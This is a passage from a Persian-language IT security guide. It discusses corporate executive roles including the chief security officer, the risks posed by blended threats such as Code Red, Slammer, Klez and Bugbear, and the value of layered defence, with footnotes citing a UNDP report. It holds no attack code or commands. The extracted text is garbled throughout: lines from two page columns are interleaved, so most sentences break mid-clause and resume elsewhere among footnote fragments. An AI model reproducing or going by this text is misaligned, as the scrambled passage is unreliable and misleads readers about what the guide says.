‫ﺗﺠﺮﺑﻴﺎﺕ ﻓﻨﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺟﻬـﺎﻥ ﺻـﻨﻌﺘﻲ ﺍﺯ ﺑﻌـﻀﻲ ﺟﻬـﺎﺕ‬
‫ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺗﻮﺟﻪ ﺧﺎﺹ ﻧﺪﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﺯﻣﺎﻥ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ )ﻣﻘﻴﺎﺱ‪ ،‬ﻫﺰﻳﻨﻪﻫﺎ‪ ،‬ﻭ ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﻛﻨـﺎﻥ(‪ ،‬ﺍﻣﺎ ﺍﺯ‬
‫ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﻳﺎ ﻣﺸﺎﻭﺭ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﻗﻮﻳﺘﺮ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﺷـﺮﻛﺖ‬
‫ﻧﻘﺎﻁ ﻗﺪﺭﺕ ﻭ ﺿﻌﻒ ﺁﻧﻬﺎ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺍﺳﺖ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﻛﻪ ﺩﺭ ﻟﺒـﺔ‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭﺳﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﮔﺮﻓﺖ‪ .‬ﺗﻌﺪﺍﺩ ﻣﺆﺳﺴﺎﺕ ﺑﺰﺭﮒ ﻛﻤﺘﺮ‬
‫ﻓﻨﺎﻭﺭﻱ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨـﺪ ﺍﻳـﻦ ﺧﻄـﺮ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣﺎﻟﻜﻴـﺖ‬
‫ﺍﺳﺖ ﻭ ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﻭﻳـﮋﻩ ﻭ ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻭﺳـﻴﻌﺘﺮﻱ‬
‫ﻧﻮﺁﻭﺭﻳﻬﺎ ﻭ ﻣﻨﺎﺑﻊ ﺣﻴﺎﺗﻲ ﺁﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺍﺯ ﺳﺮﻗﺖ ﻳﺎ ﺗﺨﺮﻳﺐ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻨﻮﺯ ﻣﻴﺎﻥ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻣﻨﻴﺘﻲ ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻣــﺴﺌﻮﻻﻥ ﻣﺮﺍﻛــﺰ ﻣﺨــﺎﺭﺝ‪ ،‬ﻣــﺪﻳﺮﺍﻥ ﺍﺭﺷــﺪ ﻣــﺎﻟﻲ ﺑﻌﻨــﻮﺍﻥ‬
‫ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﺍﻳـﻦ ﻣـﺸﻜﻼﺕ‪ ،‬ﻫﻤـﺔ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼـﻚ ﻭ‬ ‫ﻛﻨﺘﺮﻝﻛﻨﻨﺪﮔﺎﻥ ﻫﺰﻳﻨﻪ‪ ،‬ﻭ ﺷﺎﺧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺳﺎﺯﻣﺎﻥ )ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ‬
‫ﻣﺘﻮﺳﻂ ﺑﺎﻳﺪ ﻣﺮﻭﺭﻱ ﻛﺎﻣﻞ ﺑﺮ ﻣﺄﻣﻮﺭﻳﺘﻬﺎ‪ ،‬ﺍﻫﺪﺍﻑ‪ ،‬ﺻـﻼﺣﻴﺘﻬﺎ ﻭ‬ ‫‪٩‬‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻓﺮﻭﺵ ﻭ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ‪ ،‬ﻭ ﻣﺤـﺼﻮﻻﺕ( ﺗﻨـﺸﻬﺎﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬

‫ﻛﻪ ﻫﺮ ﻳﻚ ﺩﺭ ﻳﻚ ﺣﻮﺯﺓ ﺗﺠﺎﺭﻱ ﻳﺎ ﻓﻨﻲ ﻣﺘﺨﺼﺺ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻧﻘﺸﻬﺎ‬


‫‪6‬‬ ‫‪United Nations Development Program‬‬
‫ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ )ﻭﻟﻲ ﺑﻪ ﺁﻧﻬﺎ ﻣﺤﺪﻭﺩ ﻧﻤﻲﺷـﻮﻧﺪ(‪ :‬ﻣـﺪﻳﺮ ﺍﺭﺷـﺪ ﺍﺟﺮﺍﻳـﻲ‬ ‫ﺭﺟﻮﻉ ﻛﻨﻴﺪ ﺑﻪ ﮔﺰﺍﺭﺵ ﺗﻮﺳﻌﺔ ﺍﻧﺴﺎﻧﻲ ﺳﺎﻝ ‪:۲۰۰۱‬‬ ‫‪۷‬‬
‫)‪ ،(CEO‬ﻣــﺪﻳﺮ ﺍﺭﺷــﺪ ﺍﻣــﻮﺭ ﻣــﺎﻟﻲ )‪ ،(CFO‬ﻣــﺪﻳﺮ ﺍﺭﺷــﺪ ﻓﻨــﺎﻭﺭﻱ‬ ‫‪"Making New Technologies Work for Human‬‬
‫)‪ ،(CTO‬ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ )‪ ،(CIO‬ﻭ ﺑﺘﺎﺯﮔﻲ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻣﻨﻴـﺖ‬ ‫)‪Development" (UNDP: NY, 2001‬‬
‫)‪ .(CSO‬ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻌﻤﻮﻟﻲ ﻳﻚ ﺳﻠﺴﻠﻪ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ‬ ‫ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻣﻨﺎﺑﻊ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﭘـﺮﻭﮊﻩﻫـﺎﻱ‬ ‫‪۸‬‬
‫ﻗﺎﺋﻢﻣﻘﺎﻣﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻗﺒﻴﻞ ﻗﺎﺋﻢﻣﻘﺎﻡ ﺑﺎﺯﺍﺭﻳﺎﺑﻲ‪ ،‬ﻓـﺮﻭﺵ‪ ،‬ﻭ ﺗﻮﺳـﻌﺔ‬ ‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻧﺘﺎﻳﺞ ﻣﻮﺟـﻮﺩ ﺩﺭ ﻣﺆﺳـﺴﺔ ﺭﺍﻫﺒـﺮﻱ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ )‪(ITGI‬‬
‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫ﺑﺎﺯﺭﮔﺎﻧﻲ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ ﺳـﺎﺧﺘﺎﺭ ﺭﺳـﻤﻲ ﺩﺭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫‪http://www.worldbank.com‬‬
‫ﻛﻮﭼﻜﺘﺮ ﺿﺮﻭﺭﺗﻲ ﻧﺪﺍﺭﺩ )ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﻥ ﻣﻴـﺴﺮ ﻧﻴـﺴﺖ(‪ ،‬ﻣـﺸﺎﻫﺪﺓ ﭼﮕـﻮﻧﮕﻲ‬ ‫‪http://www.itgi.org‬‬
‫ﺗﻘﺴﻴﻢ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﻭ ﺗﻮﺟـﻪ ﺑـﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﻫﻤﻴـﺖ‬ ‫ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﻓﻨﻲ ﺑﺰﺭﮔﺘﺮ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺎﺯﻩﻛـﺎﺭﻱ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ‬ ‫‪۹‬‬
‫‪ CSO‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪.‬‬ ‫ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺴﺮﻋﺖ ﺭﺷﺪ ﻛﻨﻨﺪ‪ ،‬ﺗﻴﻢ ﻣﺪﻳﺮﻳﺖ ﺍﺯ ﺍﻓﺮﺍﺩﻱ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٢٤‬‬

‫ﺑﻲﺣﻔﺎﻅ ﻫﺴﺘﻨﺪ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻧﻬـﺎ ﻧﻴـﺰ ﺍﺯ ﺍﺻـﻮﻝ ﺍﻭﻟﻴـﺔ ﺍﺳـﺘﻔﺎﺩﺓ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔـﺮ ﺩﺭ ﺣـﻮﺯﻩﻫـﺎﻳﻲ‬
‫ﺍﻳﻤﻦ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﺎﺁﮔﺎﻫﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺍﺣﺘﻤﺎﻝ ﻣﻲﺭﻭﺩ ﻣﻨﺎﻃﻘﻲ ﻛﻪ‬ ‫ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ ﺩﻳﮕـﺮﺍﻥ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﺍﺯ ﺭﺷﺪ ﻓﻨﻲ ﺑﺎﻻﻳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ‪ -‬ﻣﺜﻞ ﭼﻴﻦ ‪ -‬ﺑﺎ ﭘﺮﺍﻛﻨﺪﻩﺷـﺪﻥ‬ ‫ﻼ ﺣـﻮﺯﺓ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺩﺭﺣـﺎﻝ‬‫ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺑﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ ‪ -‬ﻣـﺜ ﹰ‬
‫ﻭﻳﺮﻭﺳــﻬﺎ‪ ،‬ﻛﺮﻣﻬــﺎ‪ ،‬ﺗﺮﺍﻭﺍﻫــﺎ‪ ،‬ﻭ ﺗﻬﺪﻳــﺪﻫﺎﻱ ﭼﻨــﺪﻭﺟﻬﻲ ﻛــﻪ‬ ‫ﺗﻮﺳﻌﻪ ‪ -‬ﺑﺎﻳﺪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺤﺘﻤﻞ ﻋﻠﻴﻪ ﺍﻣﻨﻴﺖ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ‬
‫ﺁﻣﻴﺨﺘﻪﺍﻱ ﺍﺯ ﻫﻤﺔ ﺍﻳﻦ ﻋﻮﺍﻣﻞ ﻫﺴﺘﻨﺪ ﻣـﻮﺭﺩ ﺣﻤﻠـﺔ ﻣﻬـﺎﺟﻤﻴﻦ‬ ‫ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻨﺪ ﻭ ﻃﺮﺣﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﺗـﺄﺛﻴﺮ ﺁﻧﻬـﺎ ﺗـﺪﻭﻳﻦ‬
‫ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ‪.‬‬ ‫ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﮔﺮ ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﻫﺮ ﻧﺤﻮ ﺑﻪ ﺍﻣﻨﻴﺖ‬
‫ﺩﻭﻟﺖ ﻣﺮﺑﻮﻁ ﻣـﻲﺷـﻮﺩ ‪ -‬ﻣﺜـﻞ ﺍﺭﺍﺋـﻪ ﻣﺤـﺼﻮﻻﺕ ﻭ ﺧـﺪﻣﺎﺕ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺣﺎﻝ ﺣﺎﺿﺮ ﻳـﻚ ﻃﻴـﻒ ﺍﺯ ﺣﻔﺎﻇﺘﻬـﺎ ﺭﺍ ﺩﺭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ ‪ -‬ﺑﺎﻳﺪ ﻣﺘﻮﺟﻪ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺩﺭ ﭼـﻪ ﺯﻣـﺎﻧﻲ ﻭ‬
‫ﻣﻘﺎﺑﻞ ﺑﺮﻧﺎﻣﺔ ﺁﻟﻮﺩﻩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺯ ﺩﻓﺎﻉ ﻛﺎﻣﻞ ﺩﺭ ﻣﻘﺎﺑـﻞ‬
‫ﭼﮕﻮﻧﻪ ﻣﺴﺌﻮﻟﻴﺖ ﻗﺎﻧﻮﻧﻲ ﭘﺎﻳﺒﻨﺪﻱ ﺑﻪ ﺍﺣﻜـﺎﻡ ﺩﻭﻟﺘـﻲ ﺑـﺮ ﻋﻬـﺪﺓ‬
‫ﻫﻤﺔ ﺍﹶﺷﻜﺎﻝ ﺣﻤﻼﺕ‪ ،‬ﻧـﺎﺗﻮﺍﻥ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ‬
‫ﺁﻧﻬﺎﺳﺖ‪ .‬ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺳﺮﻭﻳﺲ ﺍﻳﻨﺘﺮﻧـﺖ )‪ ١٠(ISP‬ﻧﻤﻮﻧـﻪﺍﻱ‬
‫ﺩﻓﺎﻋﻲ ﭼﻨﺪﻻﻳﻪ‪ ،‬ﻫﻢ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻨـﻲ ﻭ ﻫـﻢ ﺍﺯ ﻟﺤـﺎﻅ ﺍﻧـﺴﺎﻧﻲ‬
‫ﺍﺳﺖ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎ ﻫﺮ ﺩﻭ ﻧﻮﻉ ﻣﺨﺎﻃﺮﻩ ﻣﻮﺍﺟﻪ ﺍﺳـﺖ‪ .‬ﺑـﺎ‬
‫ﻣﺨﺎﻃﺮﺓ ﺑﺮﻭﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﻮﺳـﻴﻠﺔ ﺑﺮﻧﺎﻣـﺔ ﺁﻟـﻮﺩﻩ ﺭﺍ ﺑـﻪ‬
‫ﺍﺗﺼﺎﻝ ﻣﺸﺘﺮﻱ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﺠﻬﻴـﺰﺍﺕ ﻣـﺸﺘﺮﻱ‬
‫ﺷﺪﺕ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ‪ -‬ﻫﺮﭼﻨﺪ ﺑﺎﺯ ﻫﻢ ﺁﻧﺮﺍ ﺍﺯ ﺑـﻴﻦ ﻧﻤـﻲﺑـﺮﺩ‪.‬‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﻭﺟﻬﻲ ﻣﺜﻞ ‪،Klez ،Slammer ،Code Red‬‬ ‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ‪ ،‬ﻭ ﺑﺎ ﻓﺮﺍﻫﻢ ﻛـﺮﺩﻥ ﻣﺤﺘﻮﻳـﺎﺕ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭ ﺍﺑﺰﺍﺭ ﺍﺭﺗﺒﺎﻃﻲ‪ ISP ،‬ﺩﺭ ﻣﻌﺮﺽ ﺍﺣﻜـﺎﻡ ﻭ ﻣﻘـﺮﺭﺍﺕ‬
‫ﻭ ‪ Bugbear‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺷــﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﻣــﻮﺭﺩ ﺁﺯﺍﺭ‬
‫ﻛﺸﻮﺭﻱ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﮔﺮ ﻛﺴﻲ ﻗﺎﺑﻠﻴﺖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ‬
‫ﻱ ﺧﻮﺩ ﺁﺛﺎﺭ ﻣﺨﺮﺏ‬ ‫ﺩﺍﺋﻤﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺮﻣﻬﺎ ﺑﻪ ﺧﻮﺩ ﹺ‬
‫ﻧﻴﺰ ﺑﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺑﻴﺎﻓﺰﺍﻳﺪ‪ ،‬ﺗﻬﺪﻳﺪﺍﺕ ﺑﺎﻟﻘﻮﻩ ﻭ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﻧﺪﺍﺭﻧﺪ ﺍﻣﺎ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺩﺍﻣﻬـﺎﻳﻲ ﻧـﺼﺐ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺎﻋـﺚ‬
‫ﺍﺯ ﭘﺎﻳﺒﻨﺪﻱ ﺑﻪ ﺗﻌﻬﺪﺍﺕ‪ ،‬ﺗﺒﺪﻳﻞ ﺑـﻪ ﻣـﺸﻜﻼﺗﻲ ﺑـﺴﻴﺎﺭ ﻋﻈـﻴﻢ ﻭ‬
‫ﻣﻲﺷﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﺁﻥ ﺩﺍﻣﻬﺎ ﺁﺷﻨﺎ ﻫﺴﺘﻨﺪ ﺑﻪ ﺷﺒﻜﻪ‬
‫ﺍﺳﺎﺳﻲ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺳﺮﻳﻊ ﻭ ﺁﺳﺎﻥ ﮔﺮﺩﺩ‪.‬‬
‫ﺟﺪﺍﻱ ﺍﺯ ﺍﻳﻦ ﻣﻄﻠﺐ‪ ،‬ﻛﺮﻣﻬﺎ ﺍﺯ ﺑﻌﻀﻲ ﺟﻬﺎﺕ ﺩﺭ ﻧـﺎﺗﻮﺍﻥ ﻛـﺮﺩﻥ‬ ‫ﺧﻄﺮﻫﺎﻱ ﺗﻬﺪﻳﺪﺍﺕ ﭼﻨﺪﮔﺎﻧﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻣﺆﺛﺮﺗﺮ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﻗﺎﺩﺭﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ‬
‫ﻱ ﭼﻨـﺪ ﻣﻨﺒـﻊ ﻣﻮﺛـﻖ‪ ،‬ﻳـﻚ ﺭﻭﻧـﺪ ﺻـﻌﻮﺩﻱ ﺩﺭ‬ ‫ﺩﺍﺩﻩﻫﺎﻱ ﺁﻣـﺎﺭ ﹺ‬
‫ﺩﺭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺭﺍﻳــﺞ ‪ -‬ﻣﺜــﻞ ﻣﺮﻭﺭﮔﺮﻫــﺎﻱ ﻭﺏ ‪ -‬ﺭﺍ ﻣــﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻫﺪﺍﻑ ﺟﻨـﺎﻳﻲ ﺭﺍ‬
‫ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﮔﺰﺍﺭﺷـﺎﺕ ﻣﺘﻌـﺪﺩﻱ ﺑـﻪ ﭼﻨـﻴﻦ‬
‫ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﭼﻨﻴﻦ ﺧـﺼﻮﺻﻴﺎﺗﻲ ﺩﺭ ﺁﻧﻬـﺎ ﻭﺟـﻮﺩ‬ ‫ﻣﻮﺿﻮﻋﺎﺗﻲ ﻣﺮﺑﻮﻁ ﺑﻮﺩ‪ :‬ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺩﺍﺭﺩ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﻣﺨـﺎﻃﺮﺍﺕ ﻣﻮﺟـﻮﺩ ﻭ ﻧﺤـﻮﺓ ﺑـﺮﻭﺯ‬ ‫ﺁﻟﻮﺩﻩ‪ ،‬ﺗﻐﻴﻴﺮ ﺷﻜﻞ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﺏ ﺑـﺎ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻱ ﺳﻴﺎﺳـﻲ‪،‬‬
‫ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳـﺐ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬـﺎﻱ ﺍﻧﻔـﺮﺍﺩﻱ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﺩ ﺭﺍ‬ ‫ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷﺪﺓ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ )‪ ١١(DDoS‬ﻋﻠﻴـﻪ ﺍﻫـﺪﺍﻑ‬
‫ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺗﻤـﺮﻳﻦ ﺷـﻮﺩ‪،‬‬ ‫ﺗﻌﻴﻴﻦﺷﺪﺓ ﺳﺎﺯﻣﺎﻧﻲ‪ ،‬ﻭ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ‪.‬‬
‫ﻣﺨﺎﻃﺮﺓ ﻳﻚ ﺣﻤﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ‬
‫ﺑﻌﻼﻭﻩ‪ ،‬ﮔﺴﺘﺮﺩﮔﻲ ﺗﻬﺪﻳـﺪﺍﺕ ﭼﻨـﺪﻭﺟﻬﻲ‪ ١٢‬ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ‬
‫ﻳﺎﺑﺪ‪ ،‬ﺍﻣﺎ ﻣﺠﺪﺩﹰﺍ ﺗﺄﻛﻴﺪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﺮﮔﺰ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﻪ ﺻـﻔﺮ‬
‫ﻫﻤﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻱ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ .‬ﺍﻳﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺑﻪ ﺣـﻮﺯﺓ‬
‫ﺭﺳﺎﻧﺪ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻬﺪﻳـﺪ ﺧﺮﺍﺑﻜـﺎﺭﻱ ﻋﻤـﺪﻱ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺧﺎﺻﻲ ﺗﻌﻠﻖ ﻧﺪﺍﺭﻧﺪ ﻭﻟﻲ ﺗﻤﺎﻡ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﻨـﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳـﺖ‪ ،‬ﺑﺮﺭﺳـﻲ ﻣﺨـﺎﻃﺮﺍﺕ‬
‫ﺑــﺮﺍﻱ ﻣﺜــﺎﻝ ﻛــﺮﻡ ‪ Klez‬ﺑــﺎ ﺧــﺼﻮﺻﻴﺎﺗﻲ ﺑــﻪ ﻧﮕــﺎﺭﺵ‬
‫ﺍﻣﻨﻴــﺖ ﺍﻧﻔــﺮﺍﺩﻱ ﻭ ﺗﺮﺍﻛﻨــﺸﻬﺎﻱ ﻣــﺎﻟﻲ ﻭ ﭼﺎﻟــﺸﻬﺎﻱ ﺟﺪﻳــﺪ‬
‫ﺩﺭﺁﻣﺪﻩ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻣﻌﺘﻘﺪﻧﺪ ﻳﺎ ﺩﺭ ﭼـﻴﻦ ﻭ ﻳـﺎ‬
‫ﻱ ﺑﻲﺳﻴﻢ ﺑﺴﻴﺎﺭ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ‬ ‫ﺑﻮﺟﻮﺩﺁﻣﺪﻩ ﺩﺭ ﺑﺴﺘﺮﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍ ﹺ‬
‫ﺩﺭ ﻫﻨﮓﻛﻨﮓ ﻧﻮﺷﺘﻪ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺍﺳﺖ‪.‬‬
‫ﺁﺳﻴﺎﻳﻲ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨـﺪﻩﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ‬
